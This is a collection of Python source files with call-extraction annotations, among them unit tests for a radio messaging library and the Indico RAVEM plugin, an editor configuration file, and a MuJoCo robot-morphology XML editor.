self.radio.reply('foo', foo_handler)
# Child exception
with self.assertRaises(ReplyHandlerAlreadyBound):
self.radio.reply('foo', foo_handler)
@init_radio
def test_off_handler_that_was_not_bounded(self):
'''
"stopReplying" fails when trying to unbound handler that was not
bounded.
'''
def foo_handler(): pass
with self.assertRaises(ListenerNotFound):
self.radio.stopReplying('foo', foo_handler)
@init_radio
def test_off_soft_mode(self):
'''
"stopReplying" will not fail if safe-argument is set to True.
'''
def foo_handler(): pass
self.radio.stopReplying('foo', foo_handler, soft=True)
self.radio.stopReplying('foo', foo_handler, soft=True)
@init_radio
def test_trigger_fail_on_incorrect_arguments(self):
'''
"request" fails when arguments for handler is incorrect.
'''
def foo_handler(required_arg): pass
self.radio.reply('foo', foo_handler)
with self.assertRaises(TypeError):
self.radio.request('foo')
suite = TestLoader().loadTestsFromTestCase(TestRadioRequestReplyMethods)
| [
"radio.Radio",
"unittest.TestLoader"
] | [((248, 255), 'radio.Radio', 'Radio', ([], {}), '()\n', (253, 255), False, 'from radio import Radio, ListenerNotFound, ReplyHandlerAlreadyBound, HandlerAlreadyBound\n'), ((3016, 3028), 'unittest.TestLoader', 'TestLoader', ([], {}), '()\n', (3026, 3028), False, 'from unittest import TestCase, TestLoader\n')] |
import os
import sys
DIR_OF_THIS_SCRIPT = os.path.abspath( os.path.dirname( __file__ ) )
def Settings( **kwargs ):
return {
'interpreter_path': sys.executable,
'sys_path': [ os.path.join( DIR_OF_THIS_SCRIPT, 'third_party' ) ]
}
| [
"os.path.dirname",
"os.path.join"
] | [((60, 85), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (75, 85), False, 'import os\n'), ((187, 234), 'os.path.join', 'os.path.join', (['DIR_OF_THIS_SCRIPT', '"""third_party"""'], {}), "(DIR_OF_THIS_SCRIPT, 'third_party')\n", (199, 234), False, 'import os\n')] |
# This file is part of the CERN Indico plugins.
# Copyright (C) 2014 - 2022 CERN
#
# The CERN Indico plugins are free software; you can redistribute
# them and/or modify them under the terms of the MIT License; see
# the LICENSE file for more details.
from unittest.mock import MagicMock
import pytest
from requests.exceptions import HTTPError, Timeout
from indico.testing.util import extract_logs
from indico_ravem.plugin import RavemPlugin
from indico_ravem.util import has_access, ravem_api_call
@pytest.mark.usefixtures('db')
@pytest.mark.parametrize('method', ('get', 'post'))
def test_correct_http_method(mocker, method):
request = mocker.patch('indico_ravem.util.requests.request')
response = MagicMock()
response.json.return_value = {'result': 'test'}
response.raise_for_status.return_value = False
request.return_value = response
ravem_api_call('test_endpoint', method=method, param1='test1', param2='test2')
assert request.call_count == 1
assert request.call_args[0][0] == method
@pytest.mark.usefixtures('db')
def test_correct_auth_method(mocker):
request = mocker.patch('indico_ravem.util.requests.request')
response = MagicMock()
response.json.return_value = {'result': 'test'}
response.raise_for_status.return_value = False
request.return_value = response
token = 'foo'
RavemPlugin.settings.set('access_token', token)
ravem_api_call('test_endpoint', param1='test1', param2='test2')
assert request.call_count == 1
assert 'Authorization' in request.call_args[1]['headers']
assert request.call_args[1]['headers']['Authorization'] == 'Bearer %s' % token
@pytest.mark.usefixtures('db')
def test_accepts_json(mocker):
request = mocker.patch('indico_ravem.util.requests.request')
response = MagicMock()
response.json.return_value = {'result': 'test'}
response.raise_for_status.return_value = False
request.return_value = response
ravem_api_call('test_endpoint', param1='test1', param2='test2')
assert request.call_count == 1
assert request.call_args[1]['headers']['Accept'] == 'application/json'
@pytest.mark.usefixtures('db')
@pytest.mark.parametrize(('root_endpoint', 'endpoint', 'expected_url'), (
('https://ravem.test/', 'final_endpoint', 'https://ravem.test/final_endpoint'),
('https://ravem.test/api/', 'final_endpoint', 'https://ravem.test/api/final_endpoint'),
('https://ravem.test/api/v2/', 'final_endpoint', 'https://ravem.test/api/v2/final_endpoint'),
('https://ravem.test', './final_endpoint', 'https://ravem.test/final_endpoint'),
('https://ravem.test/api/', './final_endpoint', 'https://ravem.test/api/final_endpoint'),
('https://ravem.test/api/v2/', './final_endpoint', 'https://ravem.test/api/v2/final_endpoint'),
('https://ravem.test', 'sub/final_endpoint', 'https://ravem.test/sub/final_endpoint'),
('https://ravem.test/api/', 'sub/final_endpoint', 'https://ravem.test/api/sub/final_endpoint'),
('https://ravem.test/api/v2/', 'sub/final_endpoint', 'https://ravem.test/api/v2/sub/final_endpoint'),
('https://ravem.test', './sub/final_endpoint', 'https://ravem.test/sub/final_endpoint'),
('https://ravem.test/api/', './sub/final_endpoint', 'https://ravem.test/api/sub/final_endpoint'),
('https://ravem.test/api/v2/', './sub/final_endpoint', 'https://ravem.test/api/v2/sub/final_endpoint'),
('https://ravem.test/', '', 'https://ravem.test/'),
('https://ravem.test/api/', '', 'https://ravem.test/api/'),
('https://ravem.test/api/v2/', '', 'https://ravem.test/api/v2/'),
))
def test_correct_api_endpoint(mocker, root_endpoint, endpoint, expected_url):
request = mocker.patch('indico_ravem.util.requests.request')
response = MagicMock()
response.json.return_value = {'result': 'test'}
response.raise_for_status.return_value = False
request.return_value = response
RavemPlugin.settings.set('api_endpoint', root_endpoint)
ravem_api_call(endpoint, param1='test1', param2='test2')
assert request.call_count == 1
assert request.call_args[0][1] == expected_url
@pytest.mark.usefixtures('db')
@pytest.mark.parametrize('params', (
{},
{'p1': '1stparam'},
{'p1': '1stparam', 'p2': '2ndparam'}
))
def test_params_generated(mocker, params):
request = mocker.patch('indico_ravem.util.requests.request')
response = MagicMock()
response.json.return_value = {'result': 'test'}
response.raise_for_status.return_value = False
request.return_value = response
ravem_api_call('test_endpoint', params=params)
assert request.call_count == 1
assert request.call_args[1]['params'] == params
@pytest.mark.usefixtures('db')
def test_raises_timeout(mocker):
request = mocker.patch('indico_ravem.util.requests.request')
request.side_effect = Timeout('Timeout test error message', request=request)
with pytest.raises(Timeout) as excinfo:
ravem_api_call('test_endpoint')
assert str(excinfo.value) == "Timeout while contacting the room."
assert request.call_count == 1
@pytest.mark.usefixtures('db')
@pytest.mark.parametrize(('method', 'params'), (
('get', {}),
('post', {}),
('get', {'p1': '1stparam'}),
('post', {'p1': '1stparam'}),
('get', {'p1': '1stparam', 'p2': '2ndparam'}),
('post', {'p1': '1stparam', 'p2': '2ndparam'})
))
def test_unexpected_exception_is_logged(mocker, caplog, method, params):
request = mocker.patch('indico_ravem.util.requests.request')
request.side_effect = IndexError('this is unexpected')
with pytest.raises(IndexError) as excinfo:
ravem_api_call('test_endpoint', method=method, **params)
assert str(excinfo.value) == 'this is unexpected'
log = extract_logs(caplog, one=True, name='indico.plugin.ravem')
assert log.message == "failed call: {} {} with {}: {}".format(method.upper(), 'test_endpoint', params,
'this is unexpected')
assert request.call_count == 1
@pytest.mark.usefixtures('db')
@pytest.mark.parametrize(('method', 'params'), (
('get', {}),
('post', {}),
('get', {'p1': '1stparam'}),
('post', {'p1': '1stparam'}),
('get', {'p1': '1stparam', 'p2': '2ndparam'}),
('post', {'p1': '1stparam', 'p2': '2ndparam'})
))
def test_http_error_is_logged(mocker, caplog, method, params):
request = mocker.patch('indico_ravem.util.requests.request')
request.method = method.upper()
request.url = RavemPlugin.settings.get('api_endpoint') + 'test_endpoint'
response = MagicMock()
response.raise_for_status.side_effect = HTTPError('Well this is embarrassing')
response.request = request
response.url = response.request.url
request.return_value = response
with pytest.raises(HTTPError) as excinfo:
ravem_api_call('test_endpoint', method=method, **params)
assert str(excinfo.value) == 'Well this is embarrassing'
log = extract_logs(caplog, one=True, name='indico.plugin.ravem')
assert log.message == '{} {} failed with {}'.format(
method.upper(), RavemPlugin.settings.get('api_endpoint') + 'test_endpoint', 'Well this is embarrassing')
assert request.call_count == 1
@pytest.mark.usefixtures('db')
def test_unlinked_event_vc_room_has_no_access():
event_vc_room = MagicMock()
event_vc_room.link_object = None
assert not has_access(event_vc_room)
@pytest.mark.usefixtures('db', 'request_context')
def test_unlinked_room_has_no_access(mocker):
session = mocker.patch('indico_ravem.util.session')
session.user = '<NAME>'
event_vc_room = MagicMock()
event_vc_room.link_object.room = None
assert not has_access(event_vc_room)
@pytest.mark.usefixtures('db', 'request_context')
def test_check_if_current_user_is_room_owner(mocker):
session = mocker.patch('indico_ravem.util.session')
session.user = '<NAME>'
request = mocker.patch('indico_ravem.util.request')
request.remote_addr = '192.168.127.12'
retrieve_principal = mocker.patch('indico_ravem.util._retrieve_principal')
retrieve_principal.side_effect = lambda x: session.user
event_vc_room = MagicMock()
event_vc_room.link_object.room.has_equipment = MagicMock(return_value=True)
event_vc_room.link_object.room.get_attribute_value.return_value = request.remote_addr
event_vc_room.vc_room.data.get.return_value = 'User:123'
event_vc_room.event.can_manage.return_value = False
assert has_access(event_vc_room)
@pytest.mark.usefixtures('db', 'request_context')
def test_check_if_current_user_can_modify(mocker):
request = mocker.patch('indico_ravem.util.request')
request.remote_addr = '192.168.127.12'
session = mocker.patch('indico_ravem.util.session')
session.user = '<NAME>'
mocker.patch('indico_ravem.util._retrieve_principal')
event_vc_room = MagicMock()
event_vc_room.link_object.room.has_equipment = MagicMock(return_value=True)
event_vc_room.link_object.room.get_attribute_value.return_value = request.remote_addr
event_vc_room.event.can_manage.return_value = True
assert has_access(event_vc_room)
event_vc_room.event.can_manage.assert_called_once_with(session.user)
| [
"unittest.mock.MagicMock",
"indico.testing.util.extract_logs",
"indico_ravem.plugin.RavemPlugin.settings.get",
"indico_ravem.util.has_access",
"pytest.mark.parametrize",
"pytest.raises",
"pytest.mark.usefixtures",
"requests.exceptions.HTTPError",
"indico_ravem.plugin.RavemPlugin.settings.set",
"indico_ravem.util.ravem_api_call",
"requests.exceptions.Timeout"
] | [((506, 535), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""'], {}), "('db')\n", (529, 535), False, 'import pytest\n'), ((537, 587), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""method"""', "('get', 'post')"], {}), "('method', ('get', 'post'))\n", (560, 587), False, 'import pytest\n'), ((1033, 1062), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""'], {}), "('db')\n", (1056, 1062), False, 'import pytest\n'), ((1655, 1684), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""'], {}), "('db')\n", (1678, 1684), False, 'import pytest\n'), ((2130, 2159), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""'], {}), "('db')\n", (2153, 2159), False, 'import pytest\n'), ((2161, 3611), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (["('root_endpoint', 'endpoint', 'expected_url')", "(('https://ravem.test/', 'final_endpoint',\n 'https://ravem.test/final_endpoint'), ('https://ravem.test/api/',\n 'final_endpoint', 'https://ravem.test/api/final_endpoint'), (\n 'https://ravem.test/api/v2/', 'final_endpoint',\n 'https://ravem.test/api/v2/final_endpoint'), ('https://ravem.test',\n './final_endpoint', 'https://ravem.test/final_endpoint'), (\n 'https://ravem.test/api/', './final_endpoint',\n 'https://ravem.test/api/final_endpoint'), ('https://ravem.test/api/v2/',\n './final_endpoint', 'https://ravem.test/api/v2/final_endpoint'), (\n 'https://ravem.test', 'sub/final_endpoint',\n 'https://ravem.test/sub/final_endpoint'), ('https://ravem.test/api/',\n 'sub/final_endpoint', 'https://ravem.test/api/sub/final_endpoint'), (\n 'https://ravem.test/api/v2/', 'sub/final_endpoint',\n 'https://ravem.test/api/v2/sub/final_endpoint'), ('https://ravem.test',\n './sub/final_endpoint', 'https://ravem.test/sub/final_endpoint'), (\n 'https://ravem.test/api/', './sub/final_endpoint',\n 'https://ravem.test/api/sub/final_endpoint'), (\n 'https://ravem.test/api/v2/', './sub/final_endpoint',\n 'https://ravem.test/api/v2/sub/final_endpoint'), ('https://ravem.test/',\n '', 'https://ravem.test/'), ('https://ravem.test/api/', '',\n 'https://ravem.test/api/'), ('https://ravem.test/api/v2/', '',\n 'https://ravem.test/api/v2/'))"], {}), "(('root_endpoint', 'endpoint', 'expected_url'), ((\n 'https://ravem.test/', 'final_endpoint',\n 'https://ravem.test/final_endpoint'), ('https://ravem.test/api/',\n 'final_endpoint', 'https://ravem.test/api/final_endpoint'), (\n 'https://ravem.test/api/v2/', 'final_endpoint',\n 'https://ravem.test/api/v2/final_endpoint'), ('https://ravem.test',\n './final_endpoint', 'https://ravem.test/final_endpoint'), (\n 'https://ravem.test/api/', './final_endpoint',\n 'https://ravem.test/api/final_endpoint'), ('https://ravem.test/api/v2/',\n './final_endpoint', 'https://ravem.test/api/v2/final_endpoint'), (\n 'https://ravem.test', 'sub/final_endpoint',\n 'https://ravem.test/sub/final_endpoint'), ('https://ravem.test/api/',\n 'sub/final_endpoint', 'https://ravem.test/api/sub/final_endpoint'), (\n 'https://ravem.test/api/v2/', 'sub/final_endpoint',\n 'https://ravem.test/api/v2/sub/final_endpoint'), ('https://ravem.test',\n './sub/final_endpoint', 'https://ravem.test/sub/final_endpoint'), (\n 'https://ravem.test/api/', './sub/final_endpoint',\n 'https://ravem.test/api/sub/final_endpoint'), (\n 'https://ravem.test/api/v2/', './sub/final_endpoint',\n 'https://ravem.test/api/v2/sub/final_endpoint'), ('https://ravem.test/',\n '', 'https://ravem.test/'), ('https://ravem.test/api/', '',\n 'https://ravem.test/api/'), ('https://ravem.test/api/v2/', '',\n 'https://ravem.test/api/v2/')))\n", (2184, 3611), False, 'import pytest\n'), ((4101, 4130), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""'], {}), "('db')\n", (4124, 4130), False, 'import pytest\n'), ((4132, 4233), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""params"""', "({}, {'p1': '1stparam'}, {'p1': '1stparam', 'p2': '2ndparam'})"], {}), "('params', ({}, {'p1': '1stparam'}, {'p1':\n '1stparam', 'p2': '2ndparam'}))\n", (4155, 4233), False, 'import pytest\n'), ((4661, 4690), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""'], {}), "('db')\n", (4684, 4690), False, 'import pytest\n'), ((5064, 5093), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""'], {}), "('db')\n", (5087, 5093), False, 'import pytest\n'), ((5095, 5336), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (["('method', 'params')", "(('get', {}), ('post', {}), ('get', {'p1': '1stparam'}), ('post', {'p1':\n '1stparam'}), ('get', {'p1': '1stparam', 'p2': '2ndparam'}), ('post', {\n 'p1': '1stparam', 'p2': '2ndparam'}))"], {}), "(('method', 'params'), (('get', {}), ('post', {}), (\n 'get', {'p1': '1stparam'}), ('post', {'p1': '1stparam'}), ('get', {'p1':\n '1stparam', 'p2': '2ndparam'}), ('post', {'p1': '1stparam', 'p2':\n '2ndparam'})))\n", (5118, 5336), False, 'import pytest\n'), ((6017, 6046), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""'], {}), "('db')\n", (6040, 6046), False, 'import pytest\n'), ((6048, 6289), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (["('method', 'params')", "(('get', {}), ('post', {}), ('get', {'p1': '1stparam'}), ('post', {'p1':\n '1stparam'}), ('get', {'p1': '1stparam', 'p2': '2ndparam'}), ('post', {\n 'p1': '1stparam', 'p2': '2ndparam'}))"], {}), "(('method', 'params'), (('get', {}), ('post', {}), (\n 'get', {'p1': '1stparam'}), ('post', {'p1': '1stparam'}), ('get', {'p1':\n '1stparam', 'p2': '2ndparam'}), ('post', {'p1': '1stparam', 'p2':\n '2ndparam'})))\n", (6071, 6289), False, 'import pytest\n'), ((7213, 7242), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""'], {}), "('db')\n", (7236, 7242), False, 'import pytest\n'), ((7406, 7454), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""', '"""request_context"""'], {}), "('db', 'request_context')\n", (7429, 7454), False, 'import pytest\n'), ((7705, 7753), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""', '"""request_context"""'], {}), "('db', 'request_context')\n", (7728, 7753), False, 'import pytest\n'), ((8491, 8539), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""', '"""request_context"""'], {}), "('db', 'request_context')\n", (8514, 8539), False, 'import pytest\n'), ((714, 725), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (723, 725), False, 'from unittest.mock import MagicMock\n'), ((870, 948), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['"""test_endpoint"""'], {'method': 'method', 'param1': '"""test1"""', 'param2': '"""test2"""'}), "('test_endpoint', method=method, param1='test1', param2='test2')\n", (884, 948), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((1181, 1192), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (1190, 1192), False, 'from unittest.mock import MagicMock\n'), ((1355, 1402), 'indico_ravem.plugin.RavemPlugin.settings.set', 'RavemPlugin.settings.set', (['"""access_token"""', 'token'], {}), "('access_token', token)\n", (1379, 1402), False, 'from indico_ravem.plugin import RavemPlugin\n'), ((1407, 1470), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['"""test_endpoint"""'], {'param1': '"""test1"""', 'param2': '"""test2"""'}), "('test_endpoint', param1='test1', param2='test2')\n", (1421, 1470), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((1796, 1807), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (1805, 1807), False, 'from unittest.mock import MagicMock\n'), ((1952, 2015), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['"""test_endpoint"""'], {'param1': '"""test1"""', 'param2': '"""test2"""'}), "('test_endpoint', param1='test1', param2='test2')\n", (1966, 2015), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((3738, 3749), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (3747, 3749), False, 'from unittest.mock import MagicMock\n'), ((3894, 3949), 'indico_ravem.plugin.RavemPlugin.settings.set', 'RavemPlugin.settings.set', (['"""api_endpoint"""', 'root_endpoint'], {}), "('api_endpoint', root_endpoint)\n", (3918, 3949), False, 'from indico_ravem.plugin import RavemPlugin\n'), ((3954, 4010), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['endpoint'], {'param1': '"""test1"""', 'param2': '"""test2"""'}), "(endpoint, param1='test1', param2='test2')\n", (3968, 4010), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((4367, 4378), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (4376, 4378), False, 'from unittest.mock import MagicMock\n'), ((4523, 4569), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['"""test_endpoint"""'], {'params': 'params'}), "('test_endpoint', params=params)\n", (4537, 4569), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((4815, 4869), 'requests.exceptions.Timeout', 'Timeout', (['"""Timeout test error message"""'], {'request': 'request'}), "('Timeout test error message', request=request)\n", (4822, 4869), False, 'from requests.exceptions import HTTPError, Timeout\n'), ((5725, 5783), 'indico.testing.util.extract_logs', 'extract_logs', (['caplog'], {'one': '(True)', 'name': '"""indico.plugin.ravem"""'}), "(caplog, one=True, name='indico.plugin.ravem')\n", (5737, 5783), False, 'from indico.testing.util import extract_logs\n'), ((6559, 6570), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (6568, 6570), False, 'from unittest.mock import MagicMock\n'), ((6615, 6653), 'requests.exceptions.HTTPError', 'HTTPError', (['"""Well this is embarrassing"""'], {}), "('Well this is embarrassing')\n", (6624, 6653), False, 'from requests.exceptions import HTTPError, Timeout\n'), ((6945, 7003), 'indico.testing.util.extract_logs', 'extract_logs', (['caplog'], {'one': '(True)', 'name': '"""indico.plugin.ravem"""'}), "(caplog, one=True, name='indico.plugin.ravem')\n", (6957, 7003), False, 'from indico.testing.util import extract_logs\n'), ((7312, 7323), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (7321, 7323), False, 'from unittest.mock import MagicMock\n'), ((7606, 7617), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (7615, 7617), False, 'from unittest.mock import MagicMock\n'), ((8151, 8162), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (8160, 8162), False, 'from unittest.mock import MagicMock\n'), ((8214, 8242), 'unittest.mock.MagicMock', 'MagicMock', ([], {'return_value': '(True)'}), '(return_value=True)\n', (8223, 8242), False, 'from unittest.mock import MagicMock\n'), ((8462, 8487), 'indico_ravem.util.has_access', 'has_access', (['event_vc_room'], {}), '(event_vc_room)\n', (8472, 8487), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((8853, 8864), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (8862, 8864), False, 'from unittest.mock import MagicMock\n'), ((8916, 8944), 'unittest.mock.MagicMock', 'MagicMock', ([], {'return_value': '(True)'}), '(return_value=True)\n', (8925, 8944), False, 'from unittest.mock import MagicMock\n'), ((9102, 9127), 'indico_ravem.util.has_access', 'has_access', (['event_vc_room'], {}), '(event_vc_room)\n', (9112, 9127), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((4880, 4902), 'pytest.raises', 'pytest.raises', (['Timeout'], {}), '(Timeout)\n', (4893, 4902), False, 'import pytest\n'), ((4923, 4954), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['"""test_endpoint"""'], {}), "('test_endpoint')\n", (4937, 4954), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((5557, 5582), 'pytest.raises', 'pytest.raises', (['IndexError'], {}), '(IndexError)\n', (5570, 5582), False, 'import pytest\n'), ((5603, 5659), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['"""test_endpoint"""'], {'method': 'method'}), "('test_endpoint', method=method, **params)\n", (5617, 5659), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((6485, 6525), 'indico_ravem.plugin.RavemPlugin.settings.get', 'RavemPlugin.settings.get', (['"""api_endpoint"""'], {}), "('api_endpoint')\n", (6509, 6525), False, 'from indico_ravem.plugin import RavemPlugin\n'), ((6771, 6795), 'pytest.raises', 'pytest.raises', (['HTTPError'], {}), '(HTTPError)\n', (6784, 6795), False, 'import pytest\n'), ((6816, 6872), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['"""test_endpoint"""'], {'method': 'method'}), "('test_endpoint', method=method, **params)\n", (6830, 6872), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((7377, 7402), 'indico_ravem.util.has_access', 'has_access', (['event_vc_room'], {}), '(event_vc_room)\n', (7387, 7402), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((7676, 7701), 'indico_ravem.util.has_access', 'has_access', (['event_vc_room'], {}), '(event_vc_room)\n', (7686, 7701), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((7085, 7125), 'indico_ravem.plugin.RavemPlugin.settings.get', 'RavemPlugin.settings.get', (['"""api_endpoint"""'], {}), "('api_endpoint')\n", (7109, 7125), False, 'from indico_ravem.plugin import RavemPlugin\n')] |
import numpy as np
import xml.etree.ElementTree as ET
class Geom(object):
def __init__(self, geom):
self.xml = geom
self.params = []
def get_params(self):
return self.params.copy()
def set_params(self, new_params):
self.params = new_params
def update_point(self, p, new_params):
pass
def update_xml(self):
pass
def update(self, new_params):
self.set_params(new_params)
self.update_xml()
def get_smallest_z(self):
pass
def get_param_limits(self):
pass
def get_param_names(self):
pass
def get_volume(self):
pass
class Sphere(Geom):
min_radius = .05
max_radius = .4
def __init__(self, geom):
self.xml = geom
self.params = [float(self.xml.get('size'))] # radius
self.center = np.array([float(x) for x in self.xml.get('pos').split()])
def update_point(self, p, new_params):
return ((p - self.center) * new_params[0] / self.params[0]) + self.center
def update_xml(self):
self.xml.set('size', str(self.params[0]))
def get_smallest_z(self):
return self.center[2] - self.params[0]
def get_param_limits(self):
return [[self.min_radius], [self.max_radius]]
def get_param_names(self):
return ['radius']
def get_volume(self):
return 4./3. * np.pi * self.params[0] ** 3
class Capsule(Geom):
min_length = 0.175
max_length = 0.8
min_radius = 0.035
max_radius = 0.085
def __init__(self, geom):
self.xml = geom
fromto = [float(x) for x in self.xml.get('fromto').split()]
self.p1 = np.array(fromto[:3])
self.p2 = np.array(fromto[3:])
length = np.sqrt(np.sum((self.p2 - self.p1) ** 2))
radius = float(self.xml.get('size'))
self.params = [length, radius]
self.axis = (self.p2 - self.p1) / length
def update_point(self, p, new_params):
lfac = p.dot(self.axis) * self.axis
rfac = p - lfac
return p + lfac * (-1.0 + new_params[0] / self.params[0])# + rfac * (new_params[1] / self.params[1])
def update_xml(self):
self.xml.set('fromto', ' '.join([str(x) for x in np.concatenate([self.p1, self.p2])]))
self.xml.set('size', str(self.params[1])) # radius
def set_params(self, new_params):
p1 = self.update_point(self.p1, new_params)
p2 = self.update_point(self.p2, new_params)
# update only after computing p1, p2
self.p1 = p1
self.p2 = p2
super().set_params(new_params)
def get_smallest_z(self):
return min(self.p1[2], self.p2[2]) - self.params[1]
def get_param_limits(self):
return [[self.min_length, self.min_radius], [self.max_length, self.max_radius]]
def get_param_names(self):
return ['length','radius']
def get_volume(self):
return 4./3. * np.pi * self.params[1]**3 + self.params[0] * np.pi * self.params[1]**2
class Body:
geoms = {'sphere': Sphere, 'capsule': Capsule} # dictionary of legal geometry types
def __init__(self, body, worldbody=False):
self.xml = body
self.worldbody = worldbody
geom_xml = body.find('geom') # assume only one geometry per body
self.geom = self.geoms[geom_xml.get('type')](geom_xml)
self.joints = [j for j in body.findall('joint') if 'ignore' not in j.get('name')]
self.parts = [Body(b) for b in body.findall('body')]
pos = [b.get('pos') for b in body.findall('body')]
self.part_positions = [np.array([float(x) for x in p.split()]) for p in pos]
pos = [j.get('pos') for j in self.joints]
self.joint_positions = [np.array([float(x) for x in p.split()]) for p in pos]
self.n = len(self.geom.get_params())
self.n_all_params = len(self.get_params())
self.zmin = float(self.xml.get("pos").split()[2]) - self.get_height()
def get_height(self):
max_height = -self.geom.get_smallest_z()
for body, pos in zip(self.parts, self.part_positions):
max_height = max(max_height, body.get_height() - pos[2])
return max_height
def update_initial_position(self):
pos = self.xml.get("pos").split()
pos[2] = str(self.get_height() + self.zmin)
self.xml.set("pos", ' '.join(pos))
def update_xml(self):
for body, pos in zip(self.parts, self.part_positions):
body.xml.set('pos', ' '.join([str(x) for x in pos]))
for joint, pos in zip(self.joints, self.joint_positions):
joint.set('pos', ' '.join([str(x) for x in pos]))
def set_body_positions(self, new_params):
for i, pos in enumerate(self.part_positions):
self.part_positions[i] = self.geom.update_point(pos, new_params)
for i, pos in enumerate(self.joint_positions):
self.joint_positions[i] = self.geom.update_point(pos, new_params)
def update(self, new_params):
self.set_body_positions(new_params)
self.geom.update(new_params)
self.update_xml()
def get_params(self):
params = self.geom.get_params()
for body in self.parts:
params += body.get_params()
return params
def get_param_limits(self):
limits = self.geom.get_param_limits()
for body in self.parts:
body_limits = body.get_param_limits()
limits[0] += body_limits[0]
limits[1] += body_limits[1]
return limits
def get_param_names(self):
name = self.xml.get('name')
param_names = [name + '-' + p for p in self.geom.get_param_names()]
for body in self.parts:
param_names += body.get_param_names()
return param_names
def update_params(self, new_params):
if self.worldbody: assert len(new_params) == self.n_all_params, "Wrong number of parameters"
self.update(new_params[:self.n])
remaining_params = new_params[self.n:]
for body in self.parts:
remaining_params = body.update_params(remaining_params)
if self.worldbody:
self.update_initial_position()
else:
return remaining_params
def get_body_names(self):
names = [self.xml.get('name')]
for body in self.parts:
names += body.get_names()
return names
def get_joints(self):
joints = {}
for body,pos in zip(self.parts, self.part_positions):
for j in body.joints:
joints[j.get('name')] = (self.xml.get('name'), body.xml.get('name'), self.geom, body.geom, pos)
joints.update(body.get_joints())
return joints
def get_volumes(self):
volumes = {}
if len(self.joints) > 0:
for j in self.joints:
v1 = self.geom.get_volume()
v2 = sum([b.geom.get_volume() for b in self.parts])
volumes[j.get('name')] = np.array((v1, v2))
for body in self.parts:
volumes.update(body.get_volumes())
return volumes
class MuJoCoXmlRobot:
def __init__(self, model_xml):
self.model_xml = model_xml
self.tree = ET.parse(self.model_xml)
worldbody = self.tree.getroot().find('worldbody')
self.body = Body(worldbody.find('body'), worldbody=True)
def get_params(self):
return self.body.get_params()
def get_param_limits(self):
return self.body.get_param_limits()
def get_param_names(self):
return self.body.get_param_names()
def get_height(self):
return self.body.get_height()
def get_joints(self):
return self.body.get_joints()
def get_volumes(self):
return self.body.get_volumes()
def update(self, params, xml_file=None):
if xml_file is None:
xml_file = self.model_xml
self.body.update_params(list(params))
self.tree.write(xml_file)
if __name__ == '__main__':
robot = MuJoCoXmlRobot('mujoco_assets/hopper.xml')
params = list(1.0 * np.array(robot.get_params()))
robot.update(params, 'mujoco_assets/hopper_test.xml')
assert robot.get_params() == params
#assert robot.get_height() == 1.31
print(robot.get_param_limits())
print(robot.get_param_names())
robot = MuJoCoXmlRobot('mujoco_assets/walker2d.xml')
params = [.4,.04,.5,.05,.55,.055,.6,.06,.5,.05,.55,.055,.6,.06]
robot.update(params, 'mujoco_assets/walker2d_test.xml')
assert robot.get_params() == params
assert robot.get_height() == 1.31
print(robot.get_param_limits())
print(robot.get_param_names())
robot = MuJoCoXmlRobot('mujoco_assets/ant.xml')
params = [.2, .2,.06,.2,.06,.4,.06, .2,.06,.2,.06,.4,.06, .2,.06,.2,.06,.4,.06, .2,.06,.2,.06,.4,.06]
robot.update(params, 'mujoco_assets/ant_test.xml')
assert robot.get_params() == params
assert robot.get_height() == .2
print(robot.get_param_limits())
print(robot.get_param_names())
robot = MuJoCoXmlRobot('mujoco_assets/humanoid.xml')
params = list(.8 * np.array(robot.get_params()))
robot.update(params, 'mujoco_assets/humanoid_test.xml')
assert robot.get_params() == params
print(robot.get_height())
#assert robot.get_height() == .6085
print(robot.get_param_limits())
print(robot.get_param_names())
